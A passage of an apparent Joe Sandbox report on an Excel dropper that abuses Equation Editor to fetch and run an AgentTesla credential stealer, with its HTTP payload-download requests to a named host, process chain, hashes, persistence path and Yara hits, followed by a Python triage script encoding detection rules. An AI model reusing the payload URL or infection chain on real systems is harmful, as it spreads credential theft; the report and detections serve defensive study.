Nov 27, 2020 08:27:56.096781969 CET | 2315 | OUT | GET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: fanosethiopiatours.com
Nov 27, 2020 08:27:56.272572994 CET | 2316 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Nov 2020 07:27:56 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Last-Modified: Wed, 25 Nov 2020 04:37:45 GMT
    Accept-Ranges: bytes
    Content-Length: 967680
    Vary: User-Agent
    Keep-Alive: timeout=5, max=75


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49171 | 50.87.153.103 | 80 | C:\Users\Public\name.exe

Timestamp | kBytes transferred | Direction | Data
Nov 27, 2020 08:28:06.407383919 CET | 3328 | OUT | GET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: fanosethiopiatours.com
Nov 27, 2020 08:28:06.583466053 CET | 3330 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Nov 2020 07:28:06 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Last-Modified: Wed, 25 Nov 2020 04:37:45 GMT
    Accept-Ranges: bytes
    Content-Length: 967680
    Vary: User-Agent
    Keep-Alive: timeout=5, max=75


Code Manipulations

Statistics

Behavior

                                                                      System Behavior

                                                                      General

                                                                      Start time:08:26:40
                                                                      Start date:27/11/2020
                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                      Imagebase:0x13f180000
                                                                      File size:27641504 bytes
                                                                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

General

Start time: 08:26:58
Start date: 27/11/2020
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:27:07
Start date: 27/11/2020
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe
Imagebase: 0x4a540000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:27:08
Start date: 27/11/2020
Path: C:\Users\Public\name.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\name.exe
Imagebase: 0x400000
File size: 1218752 bytes
MD5 hash: 45E25807FC1BD31A0B8309C44AFCE6E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 08:27:40
Start date: 27/11/2020
Path: C:\Users\Public\name.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\name.exe
Imagebase: 0x400000
File size: 1218752 bytes
MD5 hash: 45E25807FC1BD31A0B8309C44AFCE6E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2352654865.0000000001EE2000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2352856247.0000000002140000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2352963258.00000000022E0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2354001963.00000000033D1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000003.2215598384.0000000000338000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2354068274.0000000003426000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 08:27:50
Start date: 27/11/2020
Path: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe'
Imagebase: 0x400000
File size: 1218752 bytes
MD5 hash: 45E25807FC1BD31A0B8309C44AFCE6E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 08:27:58
Start date: 27/11/2020
Path: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe'
Imagebase: 0x400000
File size: 1218752 bytes
MD5 hash: 45E25807FC1BD31A0B8309C44AFCE6E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low

General

Start time: 08:28:38
Start date: 27/11/2020
Path: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe
Imagebase: 0x400000
File size: 1218752 bytes
MD5 hash: 45E25807FC1BD31A0B8309C44AFCE6E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2352775112.0000000002060000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2354037538.0000000003406000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2351863459.0000000000450000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2353901074.00000000033B4000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2352604798.0000000001EB2000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000003.2339765119.00000000005F4000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low
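The process list above reads as one chain. EQNEDT32.EXE is started as an OLE server (the -Embedding switch) for an object in the workbook, spawns cmd.exe, and cmd.exe runs the dropped C:\Users\Public\name.exe. The same file (same MD5) is then listed a second time with a different "Programmed in" value, Delphi at 08:27:08 and .NET at 08:27:40, which is consistent with the injection the report flags: a native loader re-spawns itself and the sandbox classifies the injected .NET code in the child, where the AgentTesla Yara rules match. The pattern repeats for the copy persisted as Hqfadrv.exe under AppData\Local\Microsoft\Windows. The script below is an added example and not part of the Joe Sandbox report; it encodes those observations as triage rules over a process list constructed from the "General" blocks above. The pids and parent links in it are assumptions, since the report gives start times but no process ids.

```python
"""Triage rules for the process chain in the behaviour section.

Added example; the records below are constructed from the report's
"General" blocks, not exported from the sandbox.  pid/ppid values are
assumed (the report gives start times, not process ids or parents).
"""
import ntpath
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Proc:
    pid: int       # assumed
    ppid: int      # assumed; 0 means the parent is not in the list
    image: str     # "Path" in the report
    cmdline: str   # "Commandline" in the report
    md5: str       # "MD5 hash" in the report
    lang: str      # "Programmed in" in the report


EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
NAME_EXE = r"C:\Users\Public\name.exe"
HQFADRV = r"C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe"
NAME_MD5 = "45E25807FC1BD31A0B8309C44AFCE6E4"
NATIVE = "C, C++ or other language"

PROCS: List[Proc] = [
    Proc(1, 0, EXCEL, f"'{EXCEL}' /automation -Embedding", "5FB0A0F93382ECD19F5F499A5CAA59F0", NATIVE),
    Proc(2, 0, EQNEDT, f"'{EQNEDT}' -Embedding", "A87236E214F6D42A65F5DEDAC816AEC8", NATIVE),
    Proc(3, 2, CMD, r"C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe", "AD7B9C14083B52BC532FBA5948342B98", NATIVE),
    Proc(4, 3, NAME_EXE, NAME_EXE, NAME_MD5, "Borland Delphi"),
    Proc(7, 4, NAME_EXE, NAME_EXE, NAME_MD5, ".Net C# or VB.NET"),
    Proc(9, 7, HQFADRV, f"'{HQFADRV}'", NAME_MD5, "Borland Delphi"),
    Proc(10, 9, HQFADRV, f"'{HQFADRV}'", NAME_MD5, "Borland Delphi"),
    Proc(11, 10, HQFADRV, HQFADRV, NAME_MD5, ".Net C# or VB.NET"),
]

# Directories that do not legitimately host executables on a workstation
# (lower-cased substrings matched against the lower-cased image path).
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "\\appdata\\local\\microsoft\\windows\\")


def base(image: str) -> str:
    return ntpath.basename(image).lower()


def lineage(procs: List[Proc], pid: int) -> List[int]:
    """Walk ppid links upward until the parent is no longer in the list."""
    by_pid = {p.pid: p for p in procs}
    chain: List[int] = []
    while pid in by_pid:
        chain.append(pid)
        pid = by_pid[pid].ppid
    return chain


def triage(procs: List[Proc]) -> List[Tuple[int, str]]:
    by_pid: Dict[int, Proc] = {p.pid: p for p in procs}
    findings: List[Tuple[int, str]] = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        image = p.image.lower()
        cmdline = p.cmdline.lower()
        # Equation Editor is an OLE server that renders formulas; it has no
        # business creating processes (CVE-2017-11882 / CVE-2018-0802 pattern).
        if parent is not None and base(parent.image) == "eqnedt32.exe":
            findings.append((p.pid, "eqnedt32_child_process"))
        # Execution from a world-writable or non-executable folder.
        if any(d in image for d in SUSPICIOUS_DIRS):
            findings.append((p.pid, "exec_from_suspicious_dir"))
        # cmd.exe /c used as a trampoline into such a folder.
        if base(p.image) == "cmd.exe" and "/c" in cmdline and any(d in cmdline for d in SUSPICIOUS_DIRS):
            findings.append((p.pid, "cmd_launches_from_suspicious_dir"))
        # Same file on disk (same MD5), child of itself, but the sandbox now
        # classifies the running code differently: a loader that re-spawns
        # itself and injects a payload built on another runtime.
        if parent is not None and parent.md5 == p.md5 and parent.image.lower() == image and parent.lang != p.lang:
            findings.append((p.pid, "self_spawn_reclassified"))
    return findings


if __name__ == "__main__":
    for pid, rule in triage(PROCS):
        print(f"pid {pid:>2} {rule:34} chain={lineage(PROCS, pid)}")
```

The first three rules are the same conditions the Sigma rules named at the top of the report express (a child of EQNEDT32.EXE, execution from a non-executable folder, a suspicious program location); the fourth is the on-disk versus in-memory mismatch that a process list alone exposes, and is the one worth checking before trusting the "Programmed in" value of any single entry.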

Disassembly

Code Analysis
